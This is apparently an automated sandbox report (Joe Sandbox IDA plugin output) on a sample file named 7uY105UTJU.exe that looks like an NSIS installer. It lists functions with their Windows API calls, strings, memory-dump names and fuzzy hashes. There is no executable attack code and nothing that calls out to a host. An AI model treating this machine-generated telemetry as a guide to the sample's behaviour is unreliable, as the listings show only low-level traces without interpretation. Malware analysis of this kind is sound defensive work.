Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
Instruction ID: 2f157a22eecee44515c187ff3daf75b9e7e255f904fde787f0dd9ddf92a1116e
Opcode Fuzzy Hash: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
Instruction Fuzzy Hash: C9312271200315BBD2206B619D49F2B3A5CEF85718F16043EFD42FA2C2DB7D99258ABD

Function 00406805 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\7uY105UTJU.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
CharNextW.USER32(?,"C:\Users\user\Desktop\7uY105UTJU.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F

Strings

*?|<>/":, xrefs: 00406857
"C:\Users\user\Desktop\7uY105UTJU.exe", xrefs: 00406849
C:\Users\user\AppData\Local\Temp\, xrefs: 00406806

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\7uY105UTJU.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3079392676
Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction ID: fa9c0ef9ae643832d728fa0671e6943ea0b093c18f887e6db6f7fe1f852dcfd9
Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction Fuzzy Hash: F111932780221299DB303B148C40E7766E8AF54794F52C43FED8A722C0F77C4C9286AD

Function 0040453D Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040455A
GetSysColor.USER32(00000000), ref: 00404598
SetTextColor.GDI32(?,00000000), ref: 004045A4
SetBkMode.GDI32(?,?), ref: 004045B0
GetSysColor.USER32(?), ref: 004045C3
SetBkColor.GDI32(?,?), ref: 004045D3
DeleteObject.GDI32(?), ref: 004045ED
CreateBrushIndirect.GDI32(?), ref: 004045F7

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction ID: 069c4eaec478219780f05c004fc5973679282d3c2eb16bc8cec9dcb23997e36d
Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction Fuzzy Hash: 592151B1500704ABCB20DF68DE08A5B7BF8AF41714B05892EEA96A22E0D739E944CF54

Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1

Part of subcall function 00406128: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040613E

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D

Strings

9, xrefs: 00402740

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
Instruction ID: e892b7cb172a86a35cdf2d5061c859a119b49b65f2ae0b0c69c9b35c58dd84de
Opcode Fuzzy Hash: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
Instruction Fuzzy Hash: F151FB75D0411AABDF24DFD4CA85AAEBBB9FF04344F10817BE901B62D0D7B49D828B58

Function 00404E91 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EAC
GetMessagePos.USER32 ref: 00404EB4
ScreenToClient.USER32(?,?), ref: 00404ECE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EE0
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F06

Strings

f, xrefs: 00404EE2

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction ID: eb967d7d92909976ed67768bbc6bf91133f1097352fa1b537f2083fc5134d3bd
Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction Fuzzy Hash: AB019E71900219BADB00DB94DD81FFEBBBCAF95710F10412BFB11B61C0C7B4AA018BA4

Function 00402F98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
MulDiv.KERNEL32(000B0A3F,00000064,000B0C43), ref: 00402FE1
wsprintfW.USER32 ref: 00402FF1
SetWindowTextW.USER32(?,?), ref: 00403001
SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013

Strings

verifying installer: %d%%, xrefs: 00402FEB

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
Instruction ID: b4a4546c530c1255e03538258eeb387f0310dfe45b0532776fb26864182fd6cc
Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
Instruction Fuzzy Hash: 8D014F71640208BBEF209F60DE49FEE3B79AB04344F108039FA02B91D0DBB99A559B59

Function 00402955 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
GlobalFree.KERNEL32(?), ref: 00402A0B
GlobalFree.KERNEL32(00000000), ref: 00402A1E
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
Instruction ID: 9240dae09012554c896714223f9a1d047de53ad28ef79bac3653223f28d0231c
Opcode Fuzzy Hash: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
Instruction Fuzzy Hash: 3931AD71D00124BBCF21AFA5CE89D9E7E79AF49324F10423AF521762E1CB794D419BA8

Function 00405F2E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsr144.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsr144.tmp,C:\Users\user\AppData\Local\Temp\nsr144.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\7uY105UTJU.exe"), ref: 00405EDF
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr144.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsr144.tmp,C:\Users\user\AppData\Local\Temp\nsr144.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\7uY105UTJU.exe"), ref: 00405F87
GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr144.tmp,C:\Users\user\AppData\Local\Temp\nsr144.tmp,C:\Users\user\AppData\Local\Temp\nsr144.tmp,C:\Users\user\AppData\Local\Temp\nsr144.tmp,C:\Users\user\AppData\Local\Temp\nsr144.tmp,C:\Users\user\AppData\Local\Temp\nsr144.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsr144.tmp,C:\Users\user\AppData\Local\Temp\nsr144.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 00405F97

Strings

4#v, xrefs: 00405F30
C:\Users\user\AppData\Local\Temp\nsr144.tmp, xrefs: 00405F34, 00405F39, 00405F3F, 00405F80, 00405F86, 00405F8E, 00405F96
C:\Users\user\AppData\Local\Temp\, xrefs: 00405F2E

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 4#v$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsr144.tmp
API String ID: 3248276644-968550793
Opcode ID: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
Instruction ID: 0bce86d1d95a7c790b53086ee47358a3377499fb664fcb231eb74dc800c81f90
Opcode Fuzzy Hash: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
Instruction Fuzzy Hash: 7AF0F43A105E1269D622733A5C09AAF1555CE86360B5A457BFC91B22C6CF3C8A42CCBE

Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: d4675444f2d34e761c1d250a7f981306a9f7540a76c819169e3a9c2f75ea5dca
Instruction ID: 7c59605d0ca35e0e1f1170af87acd2d95b5481229a772e02f8b12e0d157fbf49
Opcode Fuzzy Hash: d4675444f2d34e761c1d250a7f981306a9f7540a76c819169e3a9c2f75ea5dca
Instruction Fuzzy Hash: 2A216B7150010ABFDF119F90CE89EEF7B7DEB54398F100076B949B21E0D7B49E54AA68

Function 00401D86 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D9F
GetClientRect.USER32(?,?), ref: 00401DEA
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
DeleteObject.GDI32(00000000), ref: 00401E3E

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
Instruction ID: ff9804e90d7d2423da96771145ec8c84d1acc30631874d8c14b803c0354ed8c3
Opcode Fuzzy Hash: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
Instruction Fuzzy Hash: 73210772900119AFCB05DF98EE45AEEBBB5EF08314F14003AF945F62A0D7789D81DB98

Function 00401E53 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E56
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
ReleaseDC.USER32(?,00000000), ref: 00401E89
CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED8

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
Instruction ID: a825ad976d3f878f3d1ae6f085165680ecf176d60430839047bda31eedf7821d
Opcode Fuzzy Hash: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
Instruction Fuzzy Hash: 62017571905240EFE7005BB4EE49BDD3FA4AB15301F10867AF541B61E2C7B904458BED

Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0

Strings

!, xrefs: 00401C84

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
Instruction ID: 3d1946e732457e70d46414fe723373bc78a31951f468440fe5e33f287296c6aa
Opcode Fuzzy Hash: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
Instruction Fuzzy Hash: BC21AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941DB98

Function 00404D83 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
wsprintfW.USER32 ref: 00404E2D
SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40

Strings

%u.%u%s%s, xrefs: 00404E0E

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
